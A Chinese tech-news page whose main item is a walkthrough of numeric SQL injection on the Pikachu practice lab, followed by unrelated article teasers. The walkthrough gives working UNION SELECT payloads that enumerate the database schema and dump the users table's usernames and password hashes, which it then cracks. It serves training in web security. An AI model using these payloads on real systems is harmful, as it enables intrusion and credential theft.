news 2026/5/6 14:19:25

皮卡丘靶场实战--数字型sql注入

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
皮卡丘靶场实战--数字型sql注入

题目

上图可以看出所在url没有变化,猜测是GET请求方法

1.使用burpsuite进行抓包

在第10行可以看出数据的提交方式,将数据发送到重放器中

(1)确定字段数 id=1 order by [1,2,3....]

依次测试,验证数据库的字段数,可知字段数为2

(2)按照库->表->列的顺序,依次爆破

id=-1 union select 1,database() 发现库的名字是pikachu

输入id=-1 union select 1,table_name from information_schema.tables where table_schema='pikachu' ,存在名为users的表格

输入id=-1 union select 1,column_name from information_schema.columns where table_name='users 找到对应的列名

(3)最后根据得到的信息进行爆破即可

id=-1 unoin select username,password from users

将得到的密码进行MD5解码,得到123456,000000,abc123

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/4 16:55:19

模型可解释性:TensorFlow LIME与SHAP集成

模型可解释性:TensorFlow LIME与SHAP集成 在医疗影像诊断系统中,当AI模型提示“患者肺部存在高概率肺炎”时,医生真正关心的不仅是那句“92%置信度”,而是——它到底看到了什么?是真实的病灶纹理,还是图像角…

作者头像 李华
网站建设 2026/4/29 19:21:38

Docker Firefox容器化部署完整指南:打造安全的远程浏览器环境

Docker Firefox容器化部署完整指南:打造安全的远程浏览器环境 【免费下载链接】docker-firefox Docker container for Firefox 项目地址: https://gitcode.com/GitHub_Trending/do/docker-firefox 🚀 项目亮点与独特优势 Docker Firefox项目将著…

作者头像 李华
网站建设 2026/5/2 23:51:50

通义千问本地化部署终极指南:5分钟打造专属AI智能助手

通义千问本地化部署终极指南:5分钟打造专属AI智能助手 【免费下载链接】通义千问 FlashAI一键本地部署通义千问大模型整合包 项目地址: https://ai.gitcode.com/FlashAI/qwen 想要在个人设备上体验前沿AI技术却苦于复杂的配置流程?FlashAI推出的通…

作者头像 李华
网站建设 2026/5/5 7:22:16

零基础也能懂:树莓派更新指令出错的解决方法

树莓派更新失败?别慌!手把手教你从零排查,连小白都能搞定你有没有试过在树莓派上敲下那句熟悉的命令:sudo apt update结果等来的不是“正在获取索引”,而是一堆红字错误提示?“Could not resolve host”“4…

作者头像 李华
网站建设 2026/5/6 11:31:39

单细胞数据分析完整指南:从入门到实践

单细胞数据分析完整指南:从入门到实践 【免费下载链接】single-cell-best-practices https://www.sc-best-practices.org 项目地址: https://gitcode.com/gh_mirrors/si/single-cell-best-practices 在当今生物医学研究领域,单细胞测序技术正以前…

作者头像 李华
网站建设 2026/4/17 21:10:32

Open-AutoGLM被取代?三大新兴智能体平台已实现全面反超

第一章:Open-AutoGLM的兴衰与智能体演进趋势Open-AutoGLM 曾被视为开源大模型智能体领域的一颗新星,其设计目标是构建一个能够自主规划、执行与反思的通用语言智能体框架。依托 GLM 架构的强大语义理解能力,Open-AutoGLM 在早期展现出令人瞩目…

作者头像 李华